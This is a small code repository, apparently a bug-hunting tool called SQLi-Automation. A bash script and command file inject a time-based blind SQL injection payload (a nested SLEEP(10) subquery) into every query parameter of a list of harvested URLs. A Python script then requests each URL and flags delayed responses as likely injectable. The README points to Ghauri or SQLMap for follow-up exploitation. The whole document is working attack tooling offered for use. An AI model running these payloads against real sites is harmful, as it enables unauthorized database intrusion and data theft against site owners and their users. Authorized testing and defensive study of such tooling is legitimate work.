├── Automate.sh
├── README.md
├── Response_Time_Checker.py
└── command.txt


/Automate.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | # Run the command to inject the payload into the URLs and save the output to a file
4 | cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt
5 | 
6 | # Run the response time checker script on the generated file
7 | python3 response_time_checker.py -l blindsqli.txt -rt 10
8 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # SQLi-Automation
 2 | 
 3 | This Script Helps you to automate your SQLi Recon process!! I got this idea by seeing a tweet on Twitter regrading the same, but that dosen't work as intended. So I decided to make my own!! And share will other folks! The Script works this way:
 4 | 1. It first checks all the "=" in urls.txt (from waybackurls etc).
 5 | 2. It then replaces the value/contents of it to an SQLi payload.
 6 | 
 7 | 
 8 | #Installation Instructions:
 9 | 1. git clone https://github.com/0x2458bughunt/SQLi-Automation
10 | 2. cd SQLi-Automation
11 | 3. chmod +x automate.sh
12 | 4. ./automate.sh
13 | 
14 | OR
15 | 1. git clone https://github.com/0x2458bughunt/SQLi-Automation
16 | 2. cd SQLi-Automation
17 | 3. cat command.txt - copy the command.
18 | 4. After copying, run it where your urls.txt is there.
19 | 5. Then run response_checker.py against the new file which has SQLi payloads.
20 | 
21 | 
22 | #Note:
23 | ~# You can change SQLi payload according to your interest!
24 | ~# Make sure to give "-rt" value greater than or equal to the time delay you provided in your payload. This will avoid false Positives.
25 | ~# After it detects the time delay, make sure to exploit it manually or use Ghauri(https://github.com/r0oth3x49/ghauri) or SQLMap to confirm the Vulnerability.
26 | ~# You'll be needing qsreplace tool by tomnomnom installed. You can install it from here: https://github.com/tomnomnom/qsreplace
27 | 
28 | 
29 | #Socials:
30 | Twitter: https://twitter.com/0x2458/
31 | BuyMeACoffee: https://buymeacoffee.com/0x2458/
32 | 
33 | Feel Free to contribute! And do give it a star if you like the tool! Good luck!
34 | ~0x2458
35 | 


--------------------------------------------------------------------------------
/Response_Time_Checker.py:
--------------------------------------------------------------------------------
 1 | import argparse
 2 | import requests
 3 | from colorama import Fore, Style
 4 | 
 5 | def measure_response_time(urls_file, min_response_time):
 6 |     try:
 7 |         with open(urls_file, 'r') as file:
 8 |             urls = [line.strip() for line in file.readlines()]
 9 | 
10 |         for url in urls:
11 |             try:
12 |                 response = requests.get(url)
13 |                 response_time = response.elapsed.total_seconds()
14 | 
15 |                 if response_time >= min_response_time:
16 |                     # Print URL and response time
17 |                     print(f"URL: {url} | Response Time: ", end='')
18 | 
19 |                     # Print response time in green color
20 |                     print(Fore.GREEN + f"{response_time:.2f} seconds" + Style.RESET_ALL)
21 |             except requests.exceptions.RequestException as e:
22 |                 print(f"Error occurred while accessing the URL: {url} - {e}")
23 |     except FileNotFoundError:
24 |         print(f"URLs file '{urls_file}' not found.")
25 | 
26 | # Create command-line argument parser
27 | parser = argparse.ArgumentParser(description='Measure response time of URLs')
28 | parser.add_argument('-l', '--urls-file', help='File containing URLs')
29 | parser.add_argument('-rt', '--min-response-time', type=float, default=0,
30 |                     help='Minimum response time threshold in seconds (default: 0)')
31 | 
32 | # Parse the command-line arguments
33 | args = parser.parse_args()
34 | 
35 | # Get the URLs file and minimum response time threshold from the arguments
36 | urls_file = args.urls_file
37 | min_response_time = args.min_response_time
38 | 
39 | if not urls_file:
40 |     print('No URLs file provided.')
41 |     exit()
42 | 
43 | measure_response_time(urls_file, min_response_time)
44 | 


--------------------------------------------------------------------------------
/command.txt:
--------------------------------------------------------------------------------
1 | cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt
2 | 


--------------------------------------------------------------------------------